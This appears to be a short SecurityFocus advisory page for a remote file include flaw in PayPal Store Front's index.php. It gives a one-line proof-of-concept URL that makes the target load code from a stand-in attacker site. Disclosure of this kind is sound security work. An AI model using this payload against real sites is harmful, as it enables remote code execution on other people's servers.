info
discussion
exploit
solution
references
PayPal Store Front 'index.php' Remote File Include Vulnerability
The following proof of concept has been provided:
http://www.example.com/index.php?do=ext&page=http://www.attacker's_site.com/index
Privacy Statement
Copyright 2010, SecurityFocus
